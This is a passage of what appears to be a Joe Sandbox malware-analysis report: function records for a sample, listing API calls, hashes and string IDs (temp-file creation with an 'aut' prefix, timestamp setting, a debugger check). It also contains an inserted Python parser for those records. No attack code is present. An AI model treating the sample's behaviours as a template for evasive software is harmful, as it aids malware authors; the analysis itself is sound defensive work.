                                                • Opcode Fuzzy Hash: ef3a6c2d6a6de31637591ff0afaaa89b51133c0e695e2bab428e5b1a80857d7a
                                                • Instruction Fuzzy Hash: DC219F71A00698DBDF05DB94D849BEE7BF9AF49704F00805AE508A7241DFB85989CFA1
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __fread_nolock_memmove
                                                • String ID: EA06
                                                • API String ID: 1988441806-3962188686
                                                • Opcode ID: c3b431fd53d0e4de8617949888bd2391bdf7378134489b88755cd1531f3ef073
                                                • Instruction ID: 856936703f51d08d93b28ac55959a9e5dd8d01ef0a38ec98e905c26345e763da
                                                • Opcode Fuzzy Hash: c3b431fd53d0e4de8617949888bd2391bdf7378134489b88755cd1531f3ef073
                                                • Instruction Fuzzy Hash: 6201BE71904228AEDF15C6A8DC56EEE7BF8DB15701F00459BF552D2181D579A6048B60
                                                APIs
                                                • GetTempPathW.KERNEL32(00000104,?), ref: 007D99A1
                                                • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 007D99B8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Temp$FileNamePath
                                                • String ID: aut
                                                • API String ID: 3285503233-3010740371
                                                • Opcode ID: a3e094a786c8c903d3a1f8d2f106e35e242440c170292d1da638f8a47addd7ba
                                                • Instruction ID: efce4ff74859158dd6f1bf63f539ef1fe10b0f1fda021e46568d6547f7a97971
                                                • Opcode Fuzzy Hash: a3e094a786c8c903d3a1f8d2f106e35e242440c170292d1da638f8a47addd7ba
                                                • Instruction Fuzzy Hash: 1AD05E7994030DBBDB50ABA4EC0EFAA773CFB04700F0082B1FA54D11A1EEB49598CB95
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: bae65c0e20666bf589e92bc9085129d9e1c794b88886d92e1978792d789bf400
                                                • Instruction ID: f79e6b08fc69066175bdd04bc6dd29bb7335f4063d3554785daa98b6346be93c
                                                • Opcode Fuzzy Hash: bae65c0e20666bf589e92bc9085129d9e1c794b88886d92e1978792d789bf400
                                                • Instruction Fuzzy Hash: 2DF14675608340DFCB24DF29C484A6ABBE5FF88314F14892EF8999B251D734E946CF82
                                                APIs
                                                  • Part of subcall function 007902E2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00790313
                                                  • Part of subcall function 007902E2: MapVirtualKeyW.USER32(00000010,00000000), ref: 0079031B
                                                  • Part of subcall function 007902E2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00790326
                                                  • Part of subcall function 007902E2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00790331
                                                  • Part of subcall function 007902E2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00790339
                                                  • Part of subcall function 007902E2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00790341
                                                  • Part of subcall function 00786259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0077FA90), ref: 007862B4
                                                • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0077FB2D
                                                • OleInitialize.OLE32(00000000), ref: 0077FBAA
                                                • CloseHandle.KERNEL32(00000000), ref: 007B4921
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                • String ID:
                                                • API String ID: 1986988660-0
                                                • Opcode ID: 12facc22d95d78a652ee035ea03194f765a4126b835d8cdc9fe0cc2fed47886c
                                                • Instruction ID: 44cf8364cda62f2b896c153e9ae2648d1e7b991311612f9c3aefe6aba83e24cc
                                                • Opcode Fuzzy Hash: 12facc22d95d78a652ee035ea03194f765a4126b835d8cdc9fe0cc2fed47886c
                                                • Instruction Fuzzy Hash: D881CCF0901A40CFC788EF79E849658BBE5FBD9306750892AD119CB362EB744588CF98
                                                APIs
                                                • _memset.LIBCMT ref: 00774401
                                                • Shell_NotifyIconW.SHELL32(00000000,?), ref: 007744A6
                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007744C3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: IconNotifyShell_$_memset
                                                • String ID:
                                                • API String ID: 1505330794-0
                                                • Opcode ID: 0dc80436a4594ef9bcb6513fdddaba0727ed5884e5346f213d0fd9821047ab08
                                                • Instruction ID: 1109c05ab8f6c7fb5b5293f4f1a9e74ce67c3f4c208b0ff61d0334d0032584c0
                                                • Opcode Fuzzy Hash: 0dc80436a4594ef9bcb6513fdddaba0727ed5884e5346f213d0fd9821047ab08
                                                • Instruction Fuzzy Hash: F0316FB0505741CFDB20DF64D8846ABBBF8FB49348F004D2EF59A83251D779A944DB92
                                                APIs
                                                • __FF_MSGBANNER.LIBCMT ref: 007958A3
                                                  • Part of subcall function 0079A2EB: __NMSG_WRITE.LIBCMT ref: 0079A312
                                                  • Part of subcall function 0079A2EB: __NMSG_WRITE.LIBCMT ref: 0079A31C
                                                • __NMSG_WRITE.LIBCMT ref: 007958AA
                                                  • Part of subcall function 0079A348: GetModuleFileNameW.KERNEL32(00000000,008333BA,00000104,?,00000001,00000000), ref: 0079A3DA
                                                  • Part of subcall function 0079A348: ___crtMessageBoxW.LIBCMT ref: 0079A488
                                                  • Part of subcall function 0079321F: ___crtCorExitProcess.LIBCMT ref: 00793225
                                                  • Part of subcall function 0079321F: ExitProcess.KERNEL32 ref: 0079322E
                                                  • Part of subcall function 00798CA8: __getptd_noexit.LIBCMT ref: 00798CA8
                                                • RtlAllocateHeap.NTDLL(011F0000,00000000,00000001,00000000,?,?,?,00790F53,?), ref: 007958CF
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                • String ID:
                                                • API String ID: 1372826849-0
                                                • Opcode ID: e6403b1764f94d534af2b9b1279a15533b5fd41f6a942eb25c041add6cbef358
                                                • Instruction ID: 09b6b7d20a706b3c02cc0709c476f043c8e6729b6ccad9ebea679c7235576d0f
                                                • Opcode Fuzzy Hash: e6403b1764f94d534af2b9b1279a15533b5fd41f6a942eb25c041add6cbef358
                                                • Instruction Fuzzy Hash: 99019E35251B21EAEE122774FC46E2E7358EF82771B510925F901EA192DE7CAE4047A1
                                                APIs
                                                • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,007D95F1,?,?,?,?,?,00000004), ref: 007D9964
                                                • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,007D95F1,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 007D997A
                                                • CloseHandle.KERNEL32(00000000,?,007D95F1,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007D9981
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleTime
                                                • String ID:
                                                • API String ID: 3397143404-0
                                                • Opcode ID: 7c7c783e3ddbb23735007cd077e63827cf94ccfb6b0e7fbbd34a06c555d4a562
                                                • Instruction ID: f3655c98a1fc86e56a02975a60b6e08688d225cabc7590900af4146bfbb01053
                                                • Opcode Fuzzy Hash: 7c7c783e3ddbb23735007cd077e63827cf94ccfb6b0e7fbbd34a06c555d4a562
                                                • Instruction Fuzzy Hash: D1E08632140218B7DB211B54EC09FEE7F28AF45760F148221FB64690E08BB52921D79C
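The records above are plain text, so finding a call chain in them (the GetTempPathW/GetTempFileNameW pair whose second argument is the prefix aut, or the CreateFileW/SetFileTime/CloseHandle sequence that sets a file's timestamps) means parsing them first. The parser below is an added example for this page, not Joe Sandbox code. Its SAMPLE input is those two records copied from the report and trimmed to their API and Similarity lines; the CreateFileW argument names it prints are the standard Win32 constants for the captured values (40000000 = GENERIC_WRITE, 00000001 = FILE_SHARE_READ, 00000003 = OPEN_EXISTING, 00000080 = FILE_ATTRIBUTE_NORMAL), which the report itself does not name. Function names (parse_records, find_calls, decode_createfile) are this example's own.

```python
"""Parse Joe Sandbox 'IDA Plugin' function records (plain-text form) into
structured data so API call chains, captured arguments and fuzzy hashes can
be searched or compared across reports. Added example, not Joe Sandbox code."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Two records copied from the report on this page, trimmed to the lines used here.
SAMPLE = """\
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 007D99A1
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 007D99B8
Similarity
• API ID: Temp$FileNamePath
• String ID: aut
• Instruction Fuzzy Hash: 1AD05E7994030DBBDB50ABA4EC0EFAA773CFB04700F0082B1FA54D11A1EEB49598CB95
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,007D95F1,?,?,?,?,?,00000004), ref: 007D9964
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,007D95F1,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 007D997A
• CloseHandle.KERNEL32(00000000,?,007D95F1,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007D9981
Similarity
• API ID: File$CloseCreateHandleTime
• String ID:
• Instruction Fuzzy Hash: D1E08632140218B7DB211B54EC09FEE7F28AF45760F148221FB64690E08BB52921D79C
"""

# "Part of subcall function XXXX: " prefix, then Api.MODULE(args), ref: ADDR.
# The argument list is optional: CRT entries read "_fseek.LIBCMT ref: 0077505D".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>[A-Za-z_][\w@]*)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\),)? ref: (?P<ref>[0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^(?P<key>[^:]+):\s*(?P<val>.*)$")


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]           # captured as strings; '?' means not resolved
    ref: str                  # address of the call site
    subcall: Optional[str]    # callee address when the line is a subcall entry


@dataclass
class Record:
    fields: Dict[str, str] = field(default_factory=dict)
    calls: List[ApiCall] = field(default_factory=list)


def parse_api_line(line: str) -> Optional[ApiCall]:
    m = API_RE.match(line.strip())
    if not m:
        return None
    args = m.group("args")
    return ApiCall(m.group("api"), m.group("mod"),
                   args.split(",") if args is not None else [],
                   m.group("ref"), m.group("sub"))


def parse_records(text: str) -> List[Record]:
    """Split the text into records; 'Instruction Fuzzy Hash' closes a record."""
    records, cur = [], Record()
    for raw in text.splitlines():
        line = raw.strip().lstrip("• ").strip()
        if not line:
            continue
        call = parse_api_line(line)
        if call:                       # API lines must be tried before fields
            cur.calls.append(call)
            continue
        m = FIELD_RE.match(line)
        if m:                          # headings ("APIs", "Similarity") have no colon
            cur.fields[m.group("key")] = m.group("val")
            if m.group("key") == "Instruction Fuzzy Hash":
                records.append(cur)
                cur = Record()
    if cur.calls or cur.fields:
        records.append(cur)
    return records


def own_calls(rec: Record) -> List[str]:
    """APIs the function calls directly (subcall entries excluded)."""
    return [c.api for c in rec.calls if c.subcall is None]


def find_calls(records, api, arg_index=None, value=None) -> List[Record]:
    """Records that call `api`, optionally with argument `arg_index` == `value`."""
    return [r for r in records if any(
        c.api == api and (arg_index is None or
                          (len(c.args) > arg_index and c.args[arg_index] == value))
        for c in r.calls)]


# CreateFileW argument index -> (parameter name, known Win32 constant values).
CREATEFILE_ARGS = {
    1: ("dwDesiredAccess", {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                            0xC0000000: "GENERIC_READ|GENERIC_WRITE"}),
    2: ("dwShareMode", {0: "0", 1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE",
                        3: "FILE_SHARE_READ|FILE_SHARE_WRITE"}),
    4: ("dwCreationDisposition", {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                                  4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}),
    5: ("dwFlagsAndAttributes", {0x80: "FILE_ATTRIBUTE_NORMAL"}),
}


def decode_createfile(call: ApiCall) -> Dict[str, str]:
    """Name the constant-valued CreateFileW arguments captured in a record."""
    out = {}
    for idx, (name, table) in CREATEFILE_ARGS.items():
        if idx < len(call.args) and call.args[idx] != "?":
            v = int(call.args[idx], 16)
            out[name] = table.get(v, hex(v))
    return out


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for r in recs:
        print(r.fields.get("API ID"), "->", own_calls(r))
    for r in find_calls(recs, "GetTempFileNameW", 1, "aut"):
        print("temp file with prefix 'aut' at", r.calls[-1].ref)
    cf = next(c for r in recs for c in r.calls if c.api == "CreateFileW")
    print(decode_createfile(cf))
```

The same parser handles the subcall entries ("Part of subcall function ...") and the CRT entries without an argument list, so it can be run over a whole report dump; the aut prefix is the one the AutoIt runtime uses for the temporary files it extracts, which is why that call pair is worth locating.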
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CALL
                                                • API String ID: 0-4196123274
                                                • Opcode ID: 945aedd45f0fc38bf9475a9b234e013ff7f0f08aacede952b3b352fd8e14cbf8
                                                • Instruction ID: 3947ce3fe7ea8eb24416229ee81a43c9afe044b64bee926a512202cfb1d12d56
                                                • Opcode Fuzzy Hash: 945aedd45f0fc38bf9475a9b234e013ff7f0f08aacede952b3b352fd8e14cbf8
                                                • Instruction Fuzzy Hash: C8223770608201DFDB28DF14C494B6ABBE1BF85344F14C96DE99A8B361D739ED45CB82
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID: EA06
                                                • API String ID: 4104443479-3962188686
                                                • Opcode ID: 46539e4ab57432fe4f2a8e332897d3a9c903cdbcd2e4d9a097b23307e397a074
                                                • Instruction ID: 4f5c5cefb2671e443511c89587eb60da3f2ee275acb8eeeb34830e929935124f
                                                • Opcode Fuzzy Hash: 46539e4ab57432fe4f2a8e332897d3a9c903cdbcd2e4d9a097b23307e397a074
                                                • Instruction Fuzzy Hash: F5418071A04654DBCF218B6488557BE7FA6AF46390F58C075FC4A97182C7AC5D40C7E1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 383d694989dbc0baf493a8b16536f7282400de84b595401dfd2a8dbd0c38f622
                                                • Instruction ID: d0144fba0efbabb61b2cb7e462b5bfd3cb59ba2fccd0d55aa23d6bbb61aaf4d1
                                                • Opcode Fuzzy Hash: 383d694989dbc0baf493a8b16536f7282400de84b595401dfd2a8dbd0c38f622
                                                • Instruction Fuzzy Hash: AA411972518205DFCB28EF68D88597EB7B9EF09350B24845BF18597342FB78AD02C760
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: _memmove
                                                • String ID:
                                                • API String ID: 4104443479-0
                                                • Opcode ID: 7a447dba67378a8f7c08d596f502d4e7aa3d4b1fcc59dbac081316eacd8ee575
                                                • Instruction ID: 5cf5f0555a3caad00b80be1c4cfc5a24d1d49d2cc0ced5626908a8ea9e6d2861
                                                • Opcode Fuzzy Hash: 7a447dba67378a8f7c08d596f502d4e7aa3d4b1fcc59dbac081316eacd8ee575
                                                • Instruction Fuzzy Hash: EB31B6B2604506EFCB18DF28D8D1E69F3A9FF48360715C629E519CB291DB74E960CBA0
                                                APIs
                                                • IsThemeActive.UXTHEME ref: 00774992
                                                  • Part of subcall function 007934EC: __lock.LIBCMT ref: 007934F2
                                                  • Part of subcall function 007934EC: DecodePointer.KERNEL32(00000001,?,007749A7,007C7F9C), ref: 007934FE
                                                  • Part of subcall function 007934EC: EncodePointer.KERNEL32(?,?,007749A7,007C7F9C), ref: 00793509
                                                  • Part of subcall function 00774A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00774A73
                                                  • Part of subcall function 00774A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00774A88
                                                  • Part of subcall function 00773B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00773B7A
                                                  • Part of subcall function 00773B4C: IsDebuggerPresent.KERNEL32 ref: 00773B8C
                                                  • Part of subcall function 00773B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,008352F8,008352E0,?,?), ref: 00773BFD
                                                  • Part of subcall function 00773B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00773C81
                                                • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 007749D2
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                • String ID:
                                                • API String ID: 1438897964-0
                                                • Opcode ID: 452e403160a078e7ef8a140261f9b88d22ebb447d9a6bf1cae00f8f7ba9855d4
                                                • Instruction ID: 4991e3b2ece510533a9ae8e026d652454a4f6fa0a1e95de92135f21c5828b774
                                                • Opcode Fuzzy Hash: 452e403160a078e7ef8a140261f9b88d22ebb447d9a6bf1cae00f8f7ba9855d4
                                                • Instruction Fuzzy Hash: 31116A719093119BCB00EF29E84995AFBE8FBC8750F00C91EF549932B2DB749944CB96
                                                APIs
                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00775981,?,?,?,?), ref: 00775E27
                                                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00775981,?,?,?,?), ref: 007AE0CC
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: a68a2bab362c32334259f683f13e1df9aad820b7f5186bf36a8dd41cbb2f0ac0
                                                • Instruction ID: fb02b886a6ea56b201140d1503a9d2e983fecfe51c11838a81016d61ab6adc8f
                                                • Opcode Fuzzy Hash: a68a2bab362c32334259f683f13e1df9aad820b7f5186bf36a8dd41cbb2f0ac0
                                                • Instruction Fuzzy Hash: 79014070144608BEF7251F24CC8AF663A9CAB057A8F10C329BAE95A1E0C6F95E558B54
                                                APIs
                                                  • Part of subcall function 0079588C: __FF_MSGBANNER.LIBCMT ref: 007958A3
                                                  • Part of subcall function 0079588C: __NMSG_WRITE.LIBCMT ref: 007958AA
                                                  • Part of subcall function 0079588C: RtlAllocateHeap.NTDLL(011F0000,00000000,00000001,00000000,?,?,?,00790F53,?), ref: 007958CF
                                                • std::exception::exception.LIBCMT ref: 00790F6C
                                                • __CxxThrowException@8.LIBCMT ref: 00790F81
                                                  • Part of subcall function 0079871B: RaiseException.KERNEL32(?,?,?,00829E78,00000000,?,?,?,?,00790F86,?,00829E78,?,00000001), ref: 00798770
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                • String ID:
                                                • API String ID: 3902256705-0
                                                • Opcode ID: 82df057612b112fa07e302be1a75da9f56d3db859ccfbebe1740bd7cb1f9989f
                                                • Instruction ID: 1578f1cb0eecdc78c09e2791770d4d983c3e059e143521384ef3235308cae7ed
                                                • Opcode Fuzzy Hash: 82df057612b112fa07e302be1a75da9f56d3db859ccfbebe1740bd7cb1f9989f
                                                • Instruction Fuzzy Hash: DBF0A43150421DAACF20EA94FC099EE7BADEF01350F100465FD08D6282EFB88B54C2D1
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmp
